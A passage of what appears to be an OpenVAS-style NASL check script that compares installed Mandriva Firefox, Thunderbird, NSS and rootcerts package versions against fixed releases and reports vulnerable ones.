rpm:\"firefox-sv_SE~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ta\", rpm:\"firefox-ta~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ta_LK\", rpm:\"firefox-ta_LK~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-te\", rpm:\"firefox-te~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-th\", rpm:\"firefox-th~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-tr\", rpm:\"firefox-tr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-uk\", rpm:\"firefox-uk~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-vi\", rpm:\"firefox-vi~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_CN\", rpm:\"firefox-zh_CN~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_TW\", rpm:\"firefox-zh_TW~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zu\", rpm:\"firefox-zu~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss3\", rpm:\"libnss3~3.13.1~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-devel\", rpm:\"libnss-devel~3.13.1~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-static-devel\", rpm:\"libnss-static-devel~3.13.1~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird\", rpm:\"mozilla-thunderbird~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ar\", rpm:\"mozilla-thunderbird-ar~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-be\", rpm:\"mozilla-thunderbird-be~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-bg\", rpm:\"mozilla-thunderbird-bg~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-bn_BD\", rpm:\"mozilla-thunderbird-bn_BD~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-br\", rpm:\"mozilla-thunderbird-br~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ca\", rpm:\"mozilla-thunderbird-ca~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-cs\", rpm:\"mozilla-thunderbird-cs~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-da\", rpm:\"mozilla-thunderbird-da~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-de\", rpm:\"mozilla-thunderbird-de~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-el\", rpm:\"mozilla-thunderbird-el~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-en_GB\", rpm:\"mozilla-thunderbird-en_GB~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail\", rpm:\"mozilla-thunderbird-enigmail~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ar\", rpm:\"mozilla-thunderbird-enigmail-ar~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ca\", rpm:\"mozilla-thunderbird-enigmail-ca~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-cs\", rpm:\"mozilla-thunderbird-enigmail-cs~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-de\", rpm:\"mozilla-thunderbird-enigmail-de~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-el\", rpm:\"mozilla-thunderbird-enigmail-el~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-es\", rpm:\"mozilla-thunderbird-enigmail-es~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-fi\", rpm:\"mozilla-thunderbird-enigmail-fi~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-fr\", rpm:\"mozilla-thunderbird-enigmail-fr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-it\", rpm:\"mozilla-thunderbird-enigmail-it~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ja\", rpm:\"mozilla-thunderbird-enigmail-ja~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ko\", rpm:\"mozilla-thunderbird-enigmail-ko~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-nb\", rpm:\"mozilla-thunderbird-enigmail-nb~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-nl\", rpm:\"mozilla-thunderbird-enigmail-nl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-pl\", rpm:\"mozilla-thunderbird-enigmail-pl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-pt\", rpm:\"mozilla-thunderbird-enigmail-pt~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-pt_BR\", rpm:\"mozilla-thunderbird-enigmail-pt_BR~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ru\", rpm:\"mozilla-thunderbird-enigmail-ru~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-sl\", rpm:\"mozilla-thunderbird-enigmail-sl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-sv\", rpm:\"mozilla-thunderbird-enigmail-sv~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-tr\", rpm:\"mozilla-thunderbird-enigmail-tr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-vi\", rpm:\"mozilla-thunderbird-enigmail-vi~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-zh_CN\", rpm:\"mozilla-thunderbird-enigmail-zh_CN~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-zh_TW\", rpm:\"mozilla-thunderbird-enigmail-zh_TW~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-es_AR\", rpm:\"mozilla-thunderbird-es_AR~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-es_ES\", rpm:\"mozilla-thunderbird-es_ES~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-et\", rpm:\"mozilla-thunderbird-et~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-eu\", rpm:\"mozilla-thunderbird-eu~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-fi\", rpm:\"mozilla-thunderbird-fi~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-fr\", rpm:\"mozilla-thunderbird-fr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-fy\", rpm:\"mozilla-thunderbird-fy~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ga\", rpm:\"mozilla-thunderbird-ga~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-gd\", rpm:\"mozilla-thunderbird-gd~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-gl\", rpm:\"mozilla-thunderbird-gl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-he\", rpm:\"mozilla-thunderbird-he~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-hu\", rpm:\"mozilla-thunderbird-hu~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-id\", rpm:\"mozilla-thunderbird-id~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-is\", rpm:\"mozilla-thunderbird-is~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-it\", rpm:\"mozilla-thunderbird-it~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ja\", rpm:\"mozilla-thunderbird-ja~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ko\", rpm:\"mozilla-thunderbird-ko~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-lightning\", rpm:\"mozilla-thunderbird-lightning~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-lt\", rpm:\"mozilla-thunderbird-lt~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-nb_NO\", rpm:\"mozilla-thunderbird-nb_NO~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-nl\", rpm:\"mozilla-thunderbird-nl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-nn_NO\", rpm:\"mozilla-thunderbird-nn_NO~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-pl\", rpm:\"mozilla-thunderbird-pl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-pt_BR\", rpm:\"mozilla-thunderbird-pt_BR~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-pt_PT\", rpm:\"mozilla-thunderbird-pt_PT~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ro\", rpm:\"mozilla-thunderbird-ro~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ru\", rpm:\"mozilla-thunderbird-ru~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-si\", rpm:\"mozilla-thunderbird-si~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-sk\", rpm:\"mozilla-thunderbird-sk~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-sl\", rpm:\"mozilla-thunderbird-sl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-sq\", rpm:\"mozilla-thunderbird-sq~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-sv_SE\", rpm:\"mozilla-thunderbird-sv_SE~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ta_LK\", rpm:\"mozilla-thunderbird-ta_LK~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-tr\", rpm:\"mozilla-thunderbird-tr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-uk\", rpm:\"mozilla-thunderbird-uk~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-vi\", rpm:\"mozilla-thunderbird-vi~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-zh_CN\", rpm:\"mozilla-thunderbird-zh_CN~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-zh_TW\", rpm:\"mozilla-thunderbird-zh_TW~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nsinstall\", rpm:\"nsinstall~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.13.1~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rootcerts\", rpm:\"rootcerts~20120218.00~1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rootcerts-java\", rpm:\"rootcerts-java~20120218.00~1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-l10n\", rpm:\"firefox-l10n~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-l10n\", rpm:\"mozilla-thunderbird-l10n~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rootcerts\", rpm:\"rootcerts~20120218.00~1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss3\", rpm:\"lib64nss3~3.13.1~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-devel\", rpm:\"lib64nss-devel~3.13.1~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-static-devel\", rpm:\"lib64nss-static-devel~3.13.1~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-af\", rpm:\"firefox-af~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ar\", rpm:\"firefox-ar~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-be\", rpm:\"firefox-be~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bg\", rpm:\"firefox-bg~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn\", rpm:\"firefox-bn~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ca\", rpm:\"firefox-ca~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cs\", rpm:\"firefox-cs~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cy\", rpm:\"firefox-cy~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-da\", rpm:\"firefox-da~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-de\", rpm:\"firefox-de~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-devel\", rpm:\"firefox-devel~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-el\", rpm:\"firefox-el~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_GB\", rpm:\"firefox-en_GB~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eo\", rpm:\"firefox-eo~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_AR\", rpm:\"firefox-es_AR~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_ES\", rpm:\"firefox-es_ES~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-et\", rpm:\"firefox-et~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eu\", rpm:\"firefox-eu~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fi\", rpm:\"firefox-fi~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fr\", rpm:\"firefox-fr~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fy\", rpm:\"firefox-fy~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ga_IE\", rpm:\"firefox-ga_IE~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gl\", rpm:\"firefox-gl~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gu_IN\", rpm:\"firefox-gu_IN~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-he\", rpm:\"firefox-he~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hi\", rpm:\"firefox-hi~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hu\", rpm:\"firefox-hu~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-id\", rpm:\"firefox-id~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-is\", rpm:\"firefox-is~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-it\", rpm:\"firefox-it~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ja\", rpm:\"firefox-ja~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ka\", rpm:\"firefox-ka~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kn\", rpm:\"firefox-kn~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ko\", rpm:\"firefox-ko~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n 